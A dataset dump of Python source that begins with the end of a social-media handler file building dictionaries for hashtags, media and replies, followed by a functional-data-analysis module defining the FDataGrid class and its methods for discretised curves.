reaction_user\n\n\ndef hashtag_dict(postHashtag):\n # hashtag_id, hashtag_text, post_id\n hashtag = {}\n hashtag[\"hashtag_id\"] = postHashtag[0]\n hashtag[\"hashtag_text\"] = postHashtag[1]\n hashtag[\"post_id\"] = postHashtag[2]\n return hashtag\n\n\ndef dashboard_hashtag_dict(postHashtag):\n # hashtag_text\n hashtag = {}\n hashtag[\"hashtag_text\"] = postHashtag[0]\n hashtag[\"Total\"] = postHashtag[1]\n return hashtag\n\n\ndef media_dict(postMedia):\n # media_id, post_id, media_type, location\n media = {}\n media[\"media_id\"] = postMedia[0]\n media[\"post_id\"] = postMedia[1]\n media[\"media_type\"] = postMedia[2]\n media[\"location\"] = postMedia[3]\n return media\n\n\ndef reply_dict(postReply):\n # reply_id, reply_msg, reply_date, reply_time, user_id, post_id\n reply = {}\n reply[\"reply_id\"] = postReply[0]\n reply[\"reply_msg\"] = postReply[1]\n reply[\"reply_date\"] = postReply[2]\n reply[\"reply_username\"] = postReply[3]\n return reply\n\n\ndef post_per_day_dict(post):\n # reply_id, reply_msg, reply_date, reply_time, user_id, post_id\n postPerDay = {}\n postPerDay[\"day\"] = post[0]\n postPerDay[\"total\"] = post[1]\n return postPerDay\n","sub_path":"handler/DictBuilder.py","file_name":"DictBuilder.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"167436411","text":"\"\"\"Discretised functional data module.\n\nThis module defines a class for representing functional data as a series of\nlists of values, each representing the observation of a function measured in a\nlist of discretisation points.\n\n\"\"\"\n\nimport copy\nimport numbers\nimport warnings\nfrom typing import Any\n\nimport findiff\nimport numpy as np\nimport pandas.api.extensions\nimport scipy.stats.mstats\n\nfrom .._utils import (\n _check_array_key,\n _domain_range,\n _int_to_real,\n _tuple_of_arrays,\n constants,\n)\nfrom . import basis as fdbasis\nfrom ._functional_data import FData\nfrom .interpolation import SplineInterpolation\n\n__author__ = \"Miguel Carbajo Berrocal\"\n__email__ = \"miguel.carbajo@estudiante.uam.es\"\n\n\nclass FDataGrid(FData):\n r\"\"\"Represent discretised functional data.\n\n Class for representing functional data as a set of curves discretised\n in a grid of points.\n\n Attributes:\n data_matrix (numpy.ndarray): a matrix where each entry of the first\n axis contains the values of a functional datum evaluated at the\n points of discretisation.\n grid_points (numpy.ndarray): 2 dimension matrix where each row\n contains the points of dicretisation for each axis of data_matrix.\n domain_range (numpy.ndarray): 2 dimension matrix where each row\n contains the bounds of the interval in which the functional data\n is considered to exist for each one of the axies.\n dataset_name (str): name of the dataset.\n argument_names (tuple): tuple containing the names of the different\n arguments.\n coordinate_names (tuple): tuple containing the names of the different\n coordinate functions.\n extrapolation (str or Extrapolation): defines the default type of\n extrapolation. By default None, which does not apply any type of\n extrapolation. See `Extrapolation` for detailled information of the\n types of extrapolation.\n interpolation (GridInterpolation): Defines the type of interpolation\n applied in `evaluate`.\n\n Examples:\n Representation of a functional data object with 2 samples\n representing a function :math:`f : \\mathbb{R}\\longmapsto\\mathbb{R}`,\n with 3 discretization points.\n\n >>> data_matrix = [[1, 2, 3], [4, 5, 6]]\n >>> grid_points = [2, 4, 5]\n >>> FDataGrid(data_matrix, grid_points)\n FDataGrid(\n array([[[ 1.],\n [ 2.],\n [ 3.]],\n \n [[ 4.],\n [ 5.],\n [ 6.]]]),\n grid_points=(array([ 2., 4., 5.]),),\n domain_range=((2.0, 5.0),),\n ...)\n\n The number of columns of data_matrix have to be the length of\n grid_points.\n\n >>> FDataGrid(np.array([1,2,4,5,8]), range(6))\n Traceback (most recent call last):\n ....\n ValueError: Incorrect dimension in data_matrix and grid_points...\n\n\n FDataGrid support higher dimensional data both in the domain and image.\n Representation of a functional data object with 2 samples\n representing a function :math:`f : \\mathbb{R}\\longmapsto\\mathbb{R}^2`.\n\n >>> data_matrix = [[[1, 0.3], [2, 0.4]], [[2, 0.5], [3, 0.6]]]\n >>> grid_points = [2, 4]\n >>> fd = FDataGrid(data_matrix, grid_points)\n >>> fd.dim_domain, fd.dim_codomain\n (1, 2)\n\n Representation of a functional data object with 2 samples\n representing a function :math:`f : \\mathbb{R}^2\\longmapsto\\mathbb{R}`.\n\n >>> data_matrix = [[[1, 0.3], [2, 0.4]], [[2, 0.5], [3, 0.6]]]\n >>> grid_points = [[2, 4], [3,6]]\n >>> fd = FDataGrid(data_matrix, grid_points)\n >>> fd.dim_domain, fd.dim_codomain\n (2, 1)\n\n \"\"\"\n\n class _CoordinateIterator:\n \"\"\"Internal class to iterate through the image coordinates.\"\"\"\n\n def __init__(self, fdatagrid):\n \"\"\"Create an iterator through the image coordinates.\"\"\"\n self._fdatagrid = fdatagrid\n\n def __iter__(self):\n \"\"\"Return an iterator through the image coordinates.\"\"\"\n\n for i in range(len(self)):\n yield self[i]\n\n def __getitem__(self, key):\n \"\"\"Get a specific coordinate.\"\"\"\n\n s_key = key\n if isinstance(s_key, int):\n s_key = slice(s_key, s_key + 1)\n\n coordinate_names = np.array(\n self._fdatagrid.coordinate_names)[s_key]\n\n return self._fdatagrid.copy(\n data_matrix=self._fdatagrid.data_matrix[..., key],\n coordinate_names=coordinate_names)\n\n def __len__(self):\n \"\"\"Return the number of coordinates.\"\"\"\n return self._fdatagrid.dim_codomain\n\n def __init__(self, data_matrix, grid_points=None,\n *,\n sample_points=None,\n domain_range=None,\n dataset_label=None,\n dataset_name=None,\n argument_names=None,\n coordinate_names=None,\n sample_names=None,\n axes_labels=None, extrapolation=None,\n interpolation=None):\n \"\"\"Construct a FDataGrid object.\n\n Args:\n data_matrix (array_like): a matrix where each row contains the\n values of a functional datum evaluated at the\n points of discretisation.\n grid_points (array_like, optional): an array containing the\n points of discretisation where values have been recorded or a\n list of lists with each of the list containing the points of\n dicretisation for each axis.\n domain_range (tuple or list of tuples, optional): contains the\n edges of the interval in which the functional data is\n considered to exist (if the argument has 2 dimensions each\n row is interpreted as the limits of one of the dimension of\n the domain).\n dataset_label (str, optional): name of the dataset.\n axes_labels (list, optional): list containing the labels of the\n different axes. The length of the list must be equal to the sum\n of the number of dimensions of the domain plus the number of\n dimensions of the image.\n \"\"\"\n if sample_points is not None:\n warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n grid_points = sample_points\n\n self.data_matrix = _int_to_real(np.atleast_2d(data_matrix))\n\n if grid_points is None:\n self.grid_points = _tuple_of_arrays(\n [np.linspace(0., 1., self.data_matrix.shape[i]) for i in\n range(1, self.data_matrix.ndim)])\n\n else:\n # Check that the dimension of the data matches the grid_points\n # list\n\n self.grid_points = _tuple_of_arrays(grid_points)\n\n data_shape = self.data_matrix.shape[1: 1 + self.dim_domain]\n grid_points_shape = [len(i) for i in self.grid_points]\n\n if not np.array_equal(data_shape, grid_points_shape):\n raise ValueError(\"Incorrect dimension in data_matrix and \"\n \"grid_points. Data has shape {} and grid \"\n \"points have shape {}\"\n .format(data_shape, grid_points_shape))\n\n self._sample_range = np.array(\n [(s[0], s[-1]) for s in self.grid_points])\n\n if domain_range is None:\n domain_range = self.sample_range\n # Default value for domain_range is a list of tuples with\n # the first and last element of each list of the grid_points.\n\n self._domain_range = _domain_range(domain_range)\n\n if len(self._domain_range) != self.dim_domain:\n raise ValueError(\"Incorrect shape of domain_range.\")\n\n for i in range(self.dim_domain):\n if (self._domain_range[i][0] > self.grid_points[i][0]\n or self._domain_range[i][-1] < self.grid_points[i]\n [-1]):\n raise ValueError(\"Sample points must be within the domain \"\n \"range.\")\n\n # Adjust the data matrix if the dimension of the image is one\n if self.data_matrix.ndim == 1 + self.dim_domain:\n self.data_matrix = self.data_matrix[..., np.newaxis]\n\n self.interpolation = interpolation\n\n super().__init__(extrapolation=extrapolation,\n dataset_label=dataset_label,\n dataset_name=dataset_name,\n axes_labels=axes_labels,\n argument_names=argument_names,\n coordinate_names=coordinate_names,\n sample_names=sample_names)\n\n def round(self, decimals=0):\n \"\"\"Evenly round to the given number of decimals.\n\n Args:\n decimals (int, optional): Number of decimal places to round to.\n If decimals is negative, it specifies the number of\n positions to the left of the decimal point. Defaults to 0.\n\n Returns:\n :obj:FDataGrid: Returns a FDataGrid object where all elements\n in its data_matrix are rounded .The real and\n imaginary parts of complex numbers are rounded separately.\n\n \"\"\"\n return self.copy(data_matrix=self.data_matrix.round(decimals))\n\n @property\n def sample_points(self):\n warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n return self.grid_points\n\n @property\n def dim_domain(self):\n return len(self.grid_points)\n\n @property\n def dim_codomain(self):\n try:\n # The dimension of the image is the length of the array that can\n # be extracted from the data_matrix using all the dimensions of\n # the domain.\n return self.data_matrix.shape[1 + self.dim_domain]\n # If there is no array that means the dimension of the image is 1.\n except IndexError:\n return 1\n\n @property\n def coordinates(self):\n r\"\"\"Returns an object to access to the image coordinates.\n\n If the functional object contains multivariate samples\n :math:`f: \\mathbb{R}^n \\rightarrow \\mathbb{R}^d`, this class allows\n iterate and get coordinates of the vector\n :math:`f = (f_0, ..., f_{d-1})`.\n\n Examples:\n\n We will construct a dataset of curves in :math:`\\mathbb{R}^3`\n\n >>> from skfda.datasets import make_multimodal_samples\n >>> fd = make_multimodal_samples(dim_codomain=3, random_state=0)\n >>> fd.dim_codomain\n 3\n\n The functions of this dataset are vectorial functions\n :math:`f(t) = (f_0(t), f_1(t), f_2(t))`. We can obtain a specific\n component of the vector, for example, the first one.\n\n >>> fd_0 = fd.coordinates[0]\n >>> fd_0\n FDataGrid(...)\n\n The object returned has image dimension equal to 1\n\n >>> fd_0.dim_codomain\n 1\n\n Or we can get multiple components, it can be accesed as a 1-d\n numpy array of coordinates, for example, :math:`(f_0(t), f_1(t))`.\n\n >>> fd_01 = fd.coordinates[0:2]\n >>> fd_01.dim_codomain\n 2\n\n We can use this method to iterate throught all the coordinates.\n\n >>> for fd_i in fd.coordinates:\n ... fd_i.dim_codomain\n 1\n 1\n 1\n\n This object can be used to split a FDataGrid in a list with\n their components.\n\n >>> fd_list = list(fd.coordinates)\n >>> len(fd_list)\n 3\n\n \"\"\"\n\n return FDataGrid._CoordinateIterator(self)\n\n @property\n def n_samples(self):\n \"\"\"Return number of rows of the data_matrix. Also the number of samples.\n\n Returns:\n int: Number of samples of the FDataGrid object. Also the number of\n rows of the data_matrix.\n\n \"\"\"\n return self.data_matrix.shape[0]\n\n @property\n def ncol(self):\n \"\"\"Return number of columns of the data_matrix.\n\n Also the number of points of discretisation.\n\n Returns:\n int: Number of columns of the data_matrix.\n\n \"\"\"\n return self.data_matrix.shape[1]\n\n @property\n def sample_range(self):\n \"\"\"Return the edges of the interval in which the functional data is\n considered to exist by the sample points.\n\n Do not have to be equal to the domain_range.\n \"\"\"\n return self._sample_range\n\n @property\n def domain_range(self):\n \"\"\"Return the edges of the interval in which the functional data is\n considered to exist by the sample points.\n\n Do not have to be equal to the sample_range.\n \"\"\"\n return self._domain_range\n\n @property\n def interpolation(self):\n \"\"\"Defines the type of interpolation applied in `evaluate`.\"\"\"\n return self._interpolation\n\n @interpolation.setter\n def interpolation(self, new_interpolation):\n \"\"\"Sets the interpolation of the FDataGrid.\"\"\"\n if new_interpolation is None:\n new_interpolation = SplineInterpolation()\n\n self._interpolation = new_interpolation\n\n def _evaluate(self, eval_points, *, aligned=True):\n\n return self.interpolation.evaluate(self, eval_points,\n aligned=aligned)\n\n def derivative(self, *, order=1):\n r\"\"\"Differentiate a FDataGrid object.\n\n It is calculated using central finite differences when possible. In\n the extremes, forward and backward finite differences with accuracy\n 2 are used.\n\n Args:\n order (int, optional): Order of the derivative. Defaults to one.\n\n Examples:\n First order derivative\n\n >>> fdata = FDataGrid([1,2,4,5,8], range(5))\n >>> fdata.derivative()\n FDataGrid(\n array([[[ 0.5],\n [ 1.5],\n [ 1.5],\n [ 2. ],\n [ 4. ]]]),\n grid_points=(array([ 0., 1., 2., 3., 4.]),),\n domain_range=((0.0, 4.0),),\n ...)\n\n Second order derivative\n\n >>> fdata = FDataGrid([1,2,4,5,8], range(5))\n >>> fdata.derivative(order=2)\n FDataGrid(\n array([[[ 3.],\n [ 1.],\n [-1.],\n [ 2.],\n [ 5.]]]),\n grid_points=(array([ 0., 1., 2., 3., 4.]),),\n domain_range=((0.0, 4.0),),\n ...)\n\n \"\"\"\n order_list = np.atleast_1d(order)\n if order_list.ndim != 1 or len(order_list) != self.dim_domain:\n raise ValueError(\"The order for each partial should be specified.\")\n\n operator = findiff.FinDiff(*[(1 + i, p, o)\n for i, (p, o) in enumerate(\n zip(self.grid_points, order_list))])\n data_matrix = operator(self.data_matrix.astype(float))\n\n if self.dataset_name:\n dataset_name = \"{} - {} derivative\".format(self.dataset_name,\n order)\n else:\n dataset_name = None\n\n fdatagrid = self.copy(data_matrix=data_matrix,\n dataset_name=dataset_name)\n\n return fdatagrid\n\n def __check_same_dimensions(self, other):\n if self.data_matrix.shape[1:-1] != other.data_matrix.shape[1:-1]:\n raise ValueError(\"Error in columns dimensions\")\n if not np.array_equal(self.grid_points, other.grid_points):\n raise ValueError(\"Sample points for both objects must be equal\")\n\n def sum(self, *, axis=None, out=None, keepdims=False, skipna=False,\n min_count=0):\n \"\"\"Compute the sum of all the samples.\n\n Returns:\n FDataGrid : A FDataGrid object with just one sample representing\n the sum of all the samples in the original object.\n\n Examples:\n\n >>> from skfda import FDataGrid\n >>> data_matrix = [[0.5, 1, 2, .5], [1.5, 1, 4, .5]]\n >>> FDataGrid(data_matrix).sum()\n FDataGrid(\n array([[[ 2.],\n [ 2.],\n [ 6.],\n [ 1.]]]),\n ...)\n\n \"\"\"\n super().sum(axis=axis, out=out, keepdims=keepdims, skipna=skipna)\n\n data = (np.nansum(self.data_matrix, axis=0, keepdims=True) if skipna\n else np.sum(self.data_matrix, axis=0, keepdims=True))\n\n if min_count > 0:\n valid = ~np.isnan(self.data_matrix)\n n_valid = np.sum(valid, axis=0)\n data[n_valid < min_count] = np.NaN\n\n return self.copy(data_matrix=data,\n sample_names=(None,))\n\n def var(self):\n \"\"\"Compute the variance of a set of samples in a FDataGrid object.\n\n Returns:\n FDataGrid: A FDataGrid object with just one sample representing the\n variance of all the samples in the original FDataGrid object.\n\n \"\"\"\n return self.copy(data_matrix=[np.var(self.data_matrix, 0)],\n sample_names=(\"variance\",))\n\n def cov(self):\n \"\"\"Compute the covariance.\n\n Calculates the covariance matrix representing the covariance of the\n functional samples at the observation points.\n\n Returns:\n numpy.darray: Matrix of covariances.\n\n \"\"\"\n\n if self.dataset_name is not None:\n dataset_name = self.dataset_name + ' - covariance'\n else:\n dataset_name = None\n\n if self.dim_domain != 1 or self.dim_codomain != 1:\n raise NotImplementedError(\"Covariance only implemented \"\n \"for univariate functions\")\n\n return self.copy(data_matrix=np.cov(self.data_matrix[..., 0],\n rowvar=False)[np.newaxis, ...],\n grid_points=[self.grid_points[0],\n self.grid_points[0]],\n domain_range=[self.domain_range[0],\n self.domain_range[0]],\n dataset_name=dataset_name,\n argument_names=self.argument_names * 2,\n sample_names=(\"covariance\",))\n\n def gmean(self):\n \"\"\"Compute the geometric mean of all samples in the FDataGrid object.\n\n Returns:\n FDataGrid: A FDataGrid object with just one sample representing\n the geometric mean of all the samples in the original\n FDataGrid object.\n\n \"\"\"\n return self.copy(data_matrix=[\n scipy.stats.mstats.gmean(self.data_matrix, 0)],\n sample_names=(\"geometric mean\",))\n\n def equals(self, other):\n \"\"\"Comparison of FDataGrid objects\"\"\"\n if not super().equals(other):\n return False\n\n if not np.array_equal(self.data_matrix, other.data_matrix):\n return False\n\n if len(self.grid_points) != len(other.grid_points):\n return False\n\n for a, b in zip(self.grid_points, other.grid_points):\n if not np.array_equal(a, b):\n return False\n\n if not np.array_equal(self.domain_range, other.domain_range):\n return False\n\n if self.interpolation != other.interpolation:\n return False\n\n return True\n\n def __eq__(self, other):\n \"\"\"Elementwise equality of FDataGrid\"\"\"\n\n if not isinstance(self, type(other)) or self.dtype != other.dtype:\n if other is pandas.NA:\n return self.isna()\n if pandas.api.types.is_list_like(other) and not isinstance(\n other, (pandas.Series, pandas.Index, pandas.DataFrame),\n ):\n return np.concatenate([x == y for x, y in zip(self, other)])\n else:\n return NotImplemented\n\n if len(self) != len(other) and len(self) != 1 and len(other) != 1:\n raise ValueError(f\"Different lengths: \"\n f\"len(self)={len(self)} and \"\n f\"len(other)={len(other)}\")\n\n return np.all(self.data_matrix == other.data_matrix,\n axis=tuple(range(1, self.data_matrix.ndim)))\n\n def _get_op_matrix(self, other):\n if isinstance(other, numbers.Number):\n return other\n elif isinstance(other, np.ndarray):\n\n if other.shape == () or other.shape == (1,):\n return other\n elif other.shape == (self.n_samples,):\n other_index = ((slice(None),) + (np.newaxis,) *\n (self.data_matrix.ndim - 1))\n\n return other[other_index]\n else:\n return None\n\n elif isinstance(other, FDataGrid):\n self.__check_same_dimensions(other)\n return other.data_matrix\n else:\n return None\n\n def __add__(self, other):\n \"\"\"Addition for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix + data_matrix)\n\n def __radd__(self, other):\n \"\"\"Addition for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n\n return self.__add__(other)\n\n def __sub__(self, other):\n \"\"\"Subtraction for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix - data_matrix)\n\n def __rsub__(self, other):\n \"\"\"Right Subtraction for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self.copy(data_matrix=data_matrix - self.data_matrix)\n\n def __mul__(self, other):\n \"\"\"Multiplication for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix * data_matrix)\n\n def __rmul__(self, other):\n \"\"\"Multiplication for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n return self.__mul__(other)\n\n def __truediv__(self, other):\n \"\"\"Division for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=self.data_matrix / data_matrix)\n\n def __rtruediv__(self, other):\n \"\"\"Division for FDataGrid object.\n\n It supports other FDataGrid objects, numpy.ndarray and numbers.\n\n \"\"\"\n data_matrix = self._get_op_matrix(other)\n if data_matrix is None:\n return NotImplemented\n\n return self._copy_op(other, data_matrix=data_matrix / self.data_matrix)\n\n def concatenate(self, *others, as_coordinates=False):\n \"\"\"Join samples from a similar FDataGrid object.\n\n Joins samples from another FDataGrid object if it has the same\n dimensions and sampling points.\n\n Args:\n others (:obj:`FDataGrid`): Objects to be concatenated.\n as_coordinates (boolean, optional): If False concatenates as\n new samples, else, concatenates the other functions as\n new components of the image. Defaults to false.\n\n Returns:\n :obj:`FDataGrid`: FDataGrid object with the samples from the\n original objects.\n\n Examples:\n >>> fd = FDataGrid([1,2,4,5,8], range(5))\n >>> fd_2 = FDataGrid([3,4,7,9,2], range(5))\n >>> fd.concatenate(fd_2)\n FDataGrid(\n array([[[ 1.],\n [ 2.],\n [ 4.],\n [ 5.],\n [ 8.]],\n \n [[ 3.],\n [ 4.],\n [ 7.],\n [ 9.],\n [ 2.]]]),\n grid_points=(array([ 0., 1., 2., 3., 4.]),),\n domain_range=((0.0, 4.0),),\n ...)\n\n \"\"\"\n # Checks\n if not as_coordinates:\n for other in others:\n self.__check_same_dimensions(other)\n\n elif not all([np.array_equal(self.grid_points, other.grid_points)\n for other in others]):\n raise ValueError(\"All the FDataGrids must be sampled in the same \"\n \"sample points.\")\n\n elif any([self.n_samples != other.n_samples for other in others]):\n\n raise ValueError(f\"All the FDataGrids must contain the same \"\n f\"number of samples {self.n_samples} to \"\n f\"concatenate as a new coordinate.\")\n\n data = [self.data_matrix] + [other.data_matrix for other in others]\n\n if as_coordinates:\n\n coordinate_names = [fd.coordinate_names for fd in [self, *others]]\n\n return self.copy(data_matrix=np.concatenate(data, axis=-1),\n coordinate_names=sum(coordinate_names, ()))\n\n else:\n\n sample_names = [fd.sample_names for fd in [self, *others]]\n\n return self.copy(data_matrix=np.concatenate(data, axis=0),\n sample_names=sum(sample_names, ()))\n\n def scatter(self, *args, **kwargs):\n \"\"\"Scatter plot of the FDatGrid object.\n\n Args:\n fig (figure object, optional): figure over with the graphs are\n plotted in case ax is not specified. If None and ax is also\n None, the figure is initialized.\n axes (list of axis objects, optional): axis over where the graphs\n are plotted. If None, see param fig.\n n_rows(int, optional): designates the number of rows of the figure\n to plot the different dimensions of the image. Only specified\n if fig and ax are None.\n n_cols(int, optional): designates the number of columns of the\n figure to plot the different dimensions of the image. Only\n specified if fig and ax are None.\n kwargs: keyword arguments to be passed to the\n matplotlib.pyplot.scatter function;\n\n Returns:\n fig (figure): figure object in which the graphs are plotted.\n\n\n \"\"\"\n from ..exploratory.visualization.representation import plot_scatter\n\n return plot_scatter(self, *args, **kwargs)\n\n def to_basis(self, basis, **kwargs):\n \"\"\"Return the basis representation of the object.\n\n Args:\n basis(Basis): basis object in which the functional data are\n going to be represented.\n **kwargs: keyword arguments to be passed to\n FDataBasis.from_data().\n\n Returns:\n FDataBasis: Basis representation of the funtional data\n object.\n\n Examples:\n >>> import numpy as np\n >>> import skfda\n >>> t = np.linspace(0, 1, 5)\n >>> x = np.sin(2 * np.pi * t) + np.cos(2 * np.pi * t) + 2\n >>> x\n array([ 3., 3., 1., 1., 3.])\n\n >>> fd = FDataGrid(x, t)\n >>> basis = skfda.representation.basis.Fourier(n_basis=3)\n >>> fd_b = fd.to_basis(basis)\n >>> fd_b.coefficients.round(2)\n array([[ 2. , 0.71, 0.71]])\n\n \"\"\"\n from ..preprocessing.smoothing import BasisSmoother\n\n if self.dim_domain != basis.dim_domain:\n raise ValueError(f\"The domain of the function has \"\n f\"dimension {self.dim_domain} \"\n f\"but the domain of the basis has \"\n f\"dimension {basis.dim_domain}\")\n elif self.dim_codomain != basis.dim_codomain:\n raise ValueError(f\"The codomain of the function has \"\n f\"dimension {self.dim_codomain} \"\n f\"but the codomain of the basis has \"\n f\"dimension {basis.dim_codomain}\")\n\n # Readjust the domain range if there was not an explicit one\n if basis._domain_range is None:\n basis = basis.copy(domain_range=self.domain_range)\n\n smoother = BasisSmoother(\n basis=basis,\n **kwargs,\n return_basis=True)\n\n return smoother.fit_transform(self)\n\n def to_grid(self, grid_points=None, *, sample_points=None):\n\n if sample_points is not None:\n warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n grid_points = sample_points\n\n if grid_points is None:\n grid_points = self.grid_points\n\n return self.copy(data_matrix=self.evaluate(grid_points, grid=True),\n grid_points=grid_points)\n\n def copy(self, *,\n deep=False, # For Pandas compatibility\n data_matrix=None,\n grid_points=None,\n sample_points=None,\n domain_range=None,\n dataset_name=None,\n argument_names=None,\n coordinate_names=None,\n sample_names=None,\n extrapolation=None,\n interpolation=None):\n \"\"\"Returns a copy of the FDataGrid.\n\n If an argument is provided the corresponding attribute in the new copy\n is updated.\n\n \"\"\"\n\n if sample_points is not None:\n warnings.warn(\"Parameter sample_points is deprecated. Use the \"\n \"parameter grid_points instead.\",\n DeprecationWarning)\n grid_points = sample_points\n\n if data_matrix is None:\n # The data matrix won't be writeable\n data_matrix = self.data_matrix\n\n if grid_points is None:\n # Sample points won`t be writeable\n grid_points = self.grid_points\n\n if domain_range is None:\n domain_range = copy.deepcopy(self.domain_range)\n\n if dataset_name is None:\n dataset_name = self.dataset_name\n\n if argument_names is None:\n # Tuple, immutable\n argument_names = self.argument_names\n\n if coordinate_names is None:\n # Tuple, immutable\n coordinate_names = self.coordinate_names\n\n if sample_names is None:\n # Tuple, immutable\n sample_names = self.sample_names\n\n if extrapolation is None:\n extrapolation = self.extrapolation\n\n if interpolation is None:\n interpolation = self.interpolation\n\n return FDataGrid(data_matrix, grid_points=grid_points,\n domain_range=domain_range,\n dataset_name=dataset_name,\n argument_names=argument_names,\n coordinate_names=coordinate_names,\n sample_names=sample_names,\n extrapolation=extrapolation,\n interpolation=interpolation)\n\n def shift(self, shifts, *, restrict_domain=False, extrapolation=None,\n eval_points=None):\n \"\"\"Perform a shift of the curves.\n\n Args:\n shifts (array_like or numeric): List with the shifts\n corresponding for each sample or numeric with the shift to\n apply to all samples.\n restrict_domain (bool, optional): If True restricts the domain to\n avoid evaluate points outside the domain using extrapolation.\n Defaults uses extrapolation.\n extrapolation (str or Extrapolation, optional): Controls the\n extrapolation mode for elements outside the domain range.\n By default uses the method defined in fd. See extrapolation to\n more information.\n eval_points (array_like, optional): Set of points where\n the functions are evaluated to obtain the discrete\n representation of the object to operate. If an empty list the\n current grid_points are used to unificate the domain of the\n shifted data.\n\n Returns:\n :class:`FDataGrid` with the shifted data.\n \"\"\"\n\n if np.isscalar(shifts):\n shifts = [shifts]\n\n shifts = np.array(shifts)\n\n # Case unidimensional treated as the multidimensional\n if self.dim_domain == 1 and shifts.ndim == 1 and shifts.shape[0] != 1:\n shifts = shifts[:, np.newaxis]\n\n # Case same shift for all the curves\n if shifts.shape[0] == self.dim_domain and shifts.ndim == 1:\n\n # Column vector with shapes\n shifts = np.atleast_2d(shifts).T\n\n grid_points = self.grid_points + shifts\n domain_range = self.domain_range + shifts\n\n return self.copy(grid_points=grid_points,\n domain_range=domain_range)\n if shifts.shape[0] != self.n_samples:\n raise ValueError(f\"shifts vector ({shifts.shape[0]}) must have the\"\n f\" same length than the number of samples \"\n f\"({self.n_samples})\")\n\n if eval_points is None:\n eval_points = self.grid_points\n else:\n eval_points = np.atleast_2d(eval_points)\n\n if restrict_domain:\n domain = np.asarray(self.domain_range)\n a = domain[:, 0] - np.atleast_1d(np.min(np.min(shifts, axis=1), 0))\n b = domain[:, 1] - np.atleast_1d(np.max(np.max(shifts, axis=1), 0))\n\n domain = np.vstack((a, b)).T\n\n eval_points = [eval_points[i][\n np.logical_and(eval_points[i] >= domain[i, 0],\n eval_points[i] <= domain[i, 1])]\n for i in range(self.dim_domain)]\n\n else:\n domain = self.domain_range\n\n eval_points = np.asarray(eval_points)\n\n eval_points_repeat = np.repeat(eval_points[np.newaxis, :],\n self.n_samples, axis=0)\n\n # Solve problem with cartesian and matrix indexing\n if self.dim_domain > 1:\n shifts[:, :2] = np.flip(shifts[:, :2], axis=1)\n\n shifts = np.repeat(shifts[..., np.newaxis],\n eval_points.shape[1], axis=2)\n\n eval_points_shifted = eval_points_repeat + shifts\n\n data_matrix = self.evaluate(eval_points_shifted,\n extrapolation=extrapolation,\n aligned=False,\n grid=True)\n\n return self.copy(data_matrix=data_matrix, grid_points=eval_points,\n domain_range=domain)\n\n def compose(self, fd, *, eval_points=None):\n \"\"\"Composition of functions.\n\n Performs the composition of functions.\n\n Args:\n fd (:class:`FData`): FData object to make the composition. Should\n have the same number of samples and image dimension equal to 1.\n eval_points (array_like): Points to perform the evaluation.\n \"\"\"\n\n if self.dim_domain != fd.dim_codomain:\n raise ValueError(f\"Dimension of codomain of first function do not \"\n f\"match with the domain of the second function \"\n f\"({self.dim_domain})!=({fd.dim_codomain}).\")\n\n # All composed with same function\n if fd.n_samples == 1 and self.n_samples != 1:\n fd = fd.copy(data_matrix=np.repeat(fd.data_matrix, self.n_samples,\n axis=0))\n\n if fd.dim_domain == 1:\n if eval_points is None:\n try:\n eval_points = fd.grid_points[0]\n except AttributeError:\n eval_points = np.linspace(*fd.domain_range[0],\n constants.N_POINTS_COARSE_MESH)\n\n eval_points_transformation = fd(eval_points)\n data_matrix = self(eval_points_transformation,\n aligned=False)\n else:\n if eval_points is None:\n eval_points = fd.grid_points\n\n grid_transformation = fd(eval_points, grid=True)\n\n lengths = [len(ax) for ax in eval_points]\n\n eval_points_transformation = np.empty((self.n_samples,\n np.prod(lengths),\n self.dim_domain))\n\n for i in range(self.n_samples):\n eval_points_transformation[i] = np.array(\n list(map(np.ravel, grid_transformation[i].T))\n ).T\n\n data_matrix = self(eval_points_transformation,\n aligned=False)\n\n return self.copy(data_matrix=data_matrix,\n grid_points=eval_points,\n domain_range=fd.domain_range,\n argument_names=fd.argument_names)\n\n def __str__(self):\n \"\"\"Return str(self).\"\"\"\n return ('Data set: ' + str(self.data_matrix)\n + '\\ngrid_points: ' + str(self.grid_points)\n + '\\ntime range: ' + str(self.domain_range))\n\n def __repr__(self):\n \"\"\"Return repr(self).\"\"\"\n\n return (f\"FDataGrid(\"\n f\"\\n{repr(self.data_matrix)},\"\n f\"\\ngrid_points={repr(self.grid_points)},\"\n f\"\\ndomain_range={repr(self.domain_range)},\"\n f\"\\ndataset_name={repr(self.dataset_name)},\"\n f\"\\nargument_names={repr(self.argument_names)},\"\n f\"\\ncoordinate_names={repr(self.coordinate_names)},\"\n f\"\\nextrapolation={repr(self.extrapolation)},\"\n f\"\\ninterpolation={repr(self.interpolation)})\").replace(\n '\\n', '\\n ')\n\n def __getitem__(self, key):\n \"\"\"Return self[key].\"\"\"\n\n key = _check_array_key(self.data_matrix, key)\n\n return self.copy(data_matrix=self.data_matrix[key],\n sample_names=np.array(self.sample_names)[key])\n\n 